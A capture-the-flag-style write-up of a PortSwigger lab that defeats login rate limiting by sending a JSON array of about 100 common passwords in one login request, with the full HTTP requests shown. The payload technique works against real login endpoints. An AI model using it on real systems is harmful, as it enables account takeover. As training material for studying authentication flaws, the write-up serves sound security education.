This lab is vulnerable due to a logic flaw in its brute-force protection. To solve the lab, brute-force Carlos's password, then access his account page.

-   Victim's username: `carlos`
-   [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)

# Practical
So let's try to see what happens if we enter the wrong password for 4 times
```txt
Invalid password after multiple tries, please try again 1 minute later.
```
Looks like we get a cool down after a while, we could brute force and wait 1 minute but that isn't working smart.

Let's take a look at the request.
```html
POST /login HTTP/1.1
Host: target-ac291f511e27c037802269cc002700ac.web-security-academy.net
Cookie: session=u2IdOFH4biMSf1BVROPO3rdC5msgIqX2
Content-Length: 44
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://target-ac291f511e27c037802269cc002700ac.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target-ac291f511e27c037802269cc002700ac.web-security-academy.net/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

{"username":"carlos","password":"123","":""}
```
Spot something odd?
Yes, apparently we're sending the credentials using json format. And since we're doing multiple credentials per request, perhaps we can send a list of passwords in a single request? Let's search "JSON arrays."
And indeed we can create an array with JSON.
So let's make our password list into format that JSON can read.

```html
POST /login HTTP/1.1
Host: target-ac291f511e27c037802269cc002700ac.web-security-academy.net
Cookie: session=u2IdOFH4biMSf1BVROPO3rdC5msgIqX2
Content-Length: 1192
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://target-ac291f511e27c037802269cc002700ac.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target-ac291f511e27c037802269cc002700ac.web-security-academy.net/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

{"username":"carlos","password":["123456",
"password",
"12345678",
"qwerty",
"123456789",
"12345",
"1234",
"111111",
"1234567",
"123123",
"baseball",
"dragon",
"abc123",
"football",
"monkey",
"letmein",
"shadow",
"master",
"666666",
"qwertyuiop",
"123321",
"mustang",
"1234567890",
"michael",
"654321",
"superman",
"1qaz2wsx",
"7777777",
"121212",
"000000",
"qazwsx",
"123qwe",
"killer",
"trustno1",
"jordan",
"jennifer",
"zxcvbnm",
"asdfgh",
"hunter",
"buster",
"soccer",
"harley",
"batman",
"andrew",
"tigger",
"iloveyou",
"sunshine",
"2000",
"charlie",
"robert",
"thomas",
"hockey",
"ranger",
"daniel",
"starwars",
"klaster",
"112233",
"george",
"computer",
"michelle",
"jessica",
"pepper",
"1111",
"zxcvbn",
"555555",
"11111111",
"131313",
"freedom",
"777777",
"pass",
"maggie",
"159753",
"aaaaaa",
"ginger",
"princess",
"joshua",
"cheese",
"amanda",
"summer",
"love",
"ashley",
"nicole",
"chelsea",
"biteme",
"matthew",
"access",
"yankees",
"987654321",
"dallas",
"austin",
"thunder",
"taylor",
"matrix",
"mobilemail",
"mom",
"monitor",
"monitoring",
"montana",
"moon",
"moscow"
],"":""}
```
Now we just need to send it, and we get a status 302! Which means we're being redirected, let's request this in the browser. 

And we're now logged in and solved the lab.